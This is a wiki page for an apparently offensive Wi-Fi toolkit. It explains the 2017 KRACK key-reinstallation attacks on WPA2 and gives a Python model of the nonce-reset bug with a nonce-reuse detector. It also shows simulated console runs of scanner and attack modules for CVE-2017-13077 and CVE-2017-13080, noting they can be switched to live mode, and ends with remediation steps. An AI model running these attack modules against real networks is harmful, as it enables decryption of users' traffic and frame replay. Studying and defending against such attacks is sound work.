André Henrique edited this page Jun 8, 2026 · 1 revision

KRACK - Key Reinstallation Attacks

KRACK (Key Reinstallation Attacks) is a category of attacks against the WPA2 protocol discovered by Mathy Vanhoef and published in 2017. The attacks exploit the WPA2 4-way handshake and group key handshake, allowing an attacker to decrypt, replay, and potentially forge wireless frames.


CVE Index

| CVE | Name | Target | CVSS |
|---|---|---|---|
| CVE-2017-13077 | PTK reinstallation via 4-way handshake msg3 | Client | 8.1 |
| CVE-2017-13078 | GTK reinstallation via 4-way handshake msg3 | Client | 5.3 |
| CVE-2017-13079 | IGTK reinstallation via 4-way handshake msg3 | Client | 5.3 |
| CVE-2017-13080 | GTK reinstallation via group key handshake | Client | 5.3 |
| CVE-2017-13081 | IGTK reinstallation via group key handshake | Client | 5.3 |
| CVE-2017-13082 | Retransmit Fast BSS Transition Reassoc Request | AP | 8.1 |
| CVE-2017-13084 | STK reinstallation in PeerKey | Client | 5.3 |
| CVE-2017-13086 | TK reinstallation in TDLS | Client | 5.3 |
| CVE-2017-13087 | GTK reinstallation in Wireless Network Management sleep | Client | 5.3 |
| CVE-2017-13088 | IGTK reinstallation in Wireless Network Management sleep | Client | 5.3 |

Module Reference

| Module | Description |
|---|---|
| krack/krack_scanner | Passive scanner for KRACK nonce-reuse indicators |
| krack/krack_4way_retransmit | CVE-2017-13077 - PTK reinstallation via Msg3 retransmission |
| krack/krack_group_key_retransmit | CVE-2017-13080 - GTK reinstallation via group key handshake replay |
| cve/krack_attack | Full KRACK suite (all CVEs, wrapper) |

Background

The WPA2 4-way handshake

The 4-way handshake is used to establish a fresh Pairwise Transient Key (PTK) between a client and AP:

```
STA                                AP
 |                                  |
 | <-- Msg1: ANonce                 |
 | --> Msg2: SNonce + MIC           |
 | <-- Msg3: GTP + MIC + Install    |
 | --> Msg4: Ack                    |
 |                                  |
 [Both install PTK, begin encryption]
```

The vulnerability

When the client receives Msg3, it installs the PTK and begins encrypting traffic. The AP may retransmit Msg3 if it does not receive Msg4 in time. If the client receives a retransmitted Msg3, it reinstalls the already-installed key, resetting the cryptographic nonce (packet number) to zero.

Reusing a nonce under the same key breaks confidentiality in CCMP, because the same keystream then encrypts two different frames. With TKIP, nonce reuse also breaks integrity, since the MIC key can be recovered and used to forge frames.
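The following model is an added illustration, not code from the WirelessXPL-Forge modules: a vulnerable client reinstalls the PTK on a retransmitted Msg3 and resets its packet number, while the patched variant only re-acknowledges an already-installed key. It also shows the passive check a monitor can run (a transmitter's PN must never repeat under one key). The PTK value and the HMAC-based keystream are constructed stand-ins for the real derived key and AES-CTR.

```python
import hashlib, hmac

PTK = b"constructed-ptk-0123456789abcdef"  # constructed stand-in, not a real derived PTK

def keystream(ptk: bytes, pn: int, length: int) -> bytes:
    """Stand-in for the CCMP keystream: real CCMP runs AES-CTR under the PTK's temporal key
    with the PN in the nonce; HMAC-SHA256 over the same inputs is used so this runs without AES."""
    out, block = b"", 0
    while len(out) < length:
        msg = pn.to_bytes(6, "big") + block.to_bytes(2, "big")
        out += hmac.new(ptk, msg, hashlib.sha256).digest()
        block += 1
    return out[:length]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

class Station:
    """Minimal client model: the installed PTK and its transmit packet number (PN)."""
    def __init__(self, patched: bool):
        self.patched, self.ptk, self.pn = patched, None, 0

    def on_msg3(self, ptk: bytes) -> str:
        """Handle Msg3 of the 4-way handshake, whether first delivery or a retransmit."""
        if self.patched and self.ptk == ptk:
            return "Msg4"  # Patched: key already installed, acknowledge without reinstalling
        self.ptk, self.pn = ptk, 0  # (Re)install the PTK; the PN reset is the KRACK bug
        return "Msg4"

    def send(self, plaintext: bytes):
        self.pn += 1  # PN is incremented before every protected frame
        return self.pn, xor(plaintext, keystream(self.ptk, self.pn, len(plaintext)))

def handshake_with_retransmit(patched: bool, p1: bytes, p2: bytes):
    """Msg3, one data frame, a retransmitted Msg3 (Msg4 lost), a second data frame."""
    sta = Station(patched)
    sta.on_msg3(PTK)
    first = sta.send(p1)
    sta.on_msg3(PTK)  # AP did not receive Msg4 and retransmits Msg3
    second = sta.send(p2)
    return [first, second]

def detect_nonce_reuse(frames):
    """Passive check for a monitor: under one key a transmitter's PN must never repeat."""
    seen, alerts = set(), []
    for pn, _ in frames:
        if pn in seen:
            alerts.append(pn)
        seen.add(pn)
    return alerts
```

For the vulnerable station the two ciphertexts XOR to the XOR of the two plaintexts, which is exactly the keystream-reuse condition the scanner looks for.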


KRACK Scanner

```
wxf > use generic/wifi_lab/krack/krack_scanner
wxf (KRACKScanner) > set INTERFACE wlan0mon
wxf (KRACKScanner) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (KRACKScanner) > run

[*] Scanning for KRACK indicators on wlan0mon
[*] Target: AA:BB:CC:DD:EE:FF

[*] Probe 1: Checking for 802.11w (PMF) support... not advertised
[*] Probe 2: Monitoring 4-way handshake nonce patterns...
[*] Probe 3: Checking for WPA2 vs WPA3 SAE advertisement...

Results:
  Protocol:           WPA2-PSK (CCMP)
  PMF:                disabled (CVE-2017-13082 risk elevated)
  WPA3 transition:    no
  KRACK overall:      LIKELY VULNERABLE (WPA2 without PMF)
  CVE-2017-13077:     POSSIBLE (PTK reinstall requires client test)
  CVE-2017-13080:     POSSIBLE (GTK reinstall requires group key observation)

[*] To confirm: test with krack_4way_retransmit (requires active client)
```

CVE-2017-13077 - PTK Reinstallation

Impact: By intercepting and replaying Msg3 of the 4-way handshake, the attacker forces the client to reinstall the pairwise key with a zeroed nonce. This enables decryption of subsequent client traffic via keystream reuse.

Attack flow:

```
Normal 4-way handshake:
  STA    <-- Msg3 (encrypted GTK, install PTK now)
  STA    --> Msg4 (ack)
  [PTK installed, nonce=1]

KRACK attack:
  [Attacker blocks Msg4 from reaching AP]
  AP retransmits Msg3
  STA    <-- Msg3 (retransmit)
  STA reinstalls PTK, nonce reset to 0
  STA    --> Msg4 (ack)
  [PTK reinstalled, nonce=0 again]

  STA sends frame: nonce=1, keystream already known
  [Attacker can XOR to recover plaintext]
```

```
wxf > use generic/wifi_lab/krack/krack_4way_retransmit
wxf (KRACK-4Way) > show options

Options:
  INTERFACE     wlan0mon    Monitor mode interface
  TARGET_BSSID  (required)  Target AP BSSID
  TARGET_STA    (required)  Target client MAC address
  SIMULATE      true        Dry-run without transmitting

wxf (KRACK-4Way) > set INTERFACE wlan0mon
wxf (KRACK-4Way) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (KRACK-4Way) > set TARGET_STA 11:22:33:44:55:66
wxf (KRACK-4Way) > set SIMULATE true
wxf (KRACK-4Way) > run

[SIMULATE] CVE-2017-13077: PTK Reinstallation Attack
[SIMULATE] Target AP:  AA:BB:CC:DD:EE:FF
[SIMULATE] Target STA: 11:22:33:44:55:66

[SIMULATE] Step 1: Monitoring 4-way handshake...
[SIMULATE]   Msg1 observed: AP -> STA (ANonce captured)
[SIMULATE]   Msg2 observed: STA -> AP (SNonce captured)
[SIMULATE]   Msg3 observed: AP -> STA (encrypted GTK, PTK installed in STA)
[SIMULATE]   Blocking Msg4 from reaching AP...

[SIMULATE] Step 2: AP retransmits Msg3...
[SIMULATE]   Msg3 retransmit forwarded to STA
[SIMULATE]   STA reinstalls PTK, resets nonce to 0

[SIMULATE] Step 3: Collect encrypted frames with nonce=1 (repeated)
[SIMULATE]   Keystream XOR: plaintext partially recoverable

[SIMULATE] Vulnerability confirmed: STA accepted Msg3 retransmit
[!] Set SIMULATE=false to run live
[!] PREREQ: wlan0mon + ability to block/inject frames (channel + MitM position)
[!] NOTE: Most clients patched after 2017. Android 6/7 were most affected.
```

CVE-2017-13080 - GTK Reinstallation

Impact: By replaying the group key handshake, the attacker forces reinstallation of the group key (GTK) with a zeroed replay counter, enabling replay of broadcast/multicast frames.

```
wxf > use generic/wifi_lab/krack/krack_group_key_retransmit
wxf (KRACK-GroupKey) > show options

Options:
  INTERFACE     wlan0mon    Monitor mode interface
  TARGET_BSSID  (required)  Target AP BSSID
  TARGET_STA    (required)  Target client MAC address
  SIMULATE      true        Dry-run

wxf (KRACK-GroupKey) > set INTERFACE wlan0mon
wxf (KRACK-GroupKey) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (KRACK-GroupKey) > set TARGET_STA 11:22:33:44:55:66
wxf (KRACK-GroupKey) > set SIMULATE true
wxf (KRACK-GroupKey) > run

[SIMULATE] CVE-2017-13080: GTK Reinstallation via Group Key Handshake Replay
[SIMULATE] Target AP:  AA:BB:CC:DD:EE:FF
[SIMULATE] Target STA: 11:22:33:44:55:66

[SIMULATE] Step 1: Monitor group key handshake (AP -> STA, encrypted with PTK)
[SIMULATE]   Group Key Msg1 captured (contains new GTK)
[SIMULATE]   Group Key Msg2 observed: STA -> AP (ack)

[SIMULATE] Step 2: Block Msg2 reaching AP
[SIMULATE]   AP retransmits Group Key Msg1
[SIMULATE]   STA reinstalls GTK, replay counter reset to 0

[SIMULATE] Step 3: Replay a previously captured broadcast frame
[SIMULATE]   Old DHCP broadcast: timestamp T-60s, replay counter X
[SIMULATE]   After GTK reinstall: counter reset, old frame accepted
[SIMULATE]   Effect: ARP/DHCP replay, potential IP conflict / MitM opportunity

[!] Set SIMULATE=false to run live
[!] PREREQ: MitM position between STA and AP + wlan0mon
```

Remediation

  • Apply all operating system and driver updates (virtually all platforms patched by 2018)
  • Verify clients are not running unpatched Android 6.x / 7.x
  • Enable WPA3-SAE where available (SAE is not affected by KRACK)
  • Enable PMF (802.11w) to protect management frames
  • Use encrypted application-layer protocols (HTTPS, TLS, VPN) as defense in depth

References:


Related pages: FragAttacks | Wi-Fi Attacks | Configuration


Author: Andre Henrique (@mrhenrike) | Uniao Geek

WirelessXPL-Forge v1.8.0
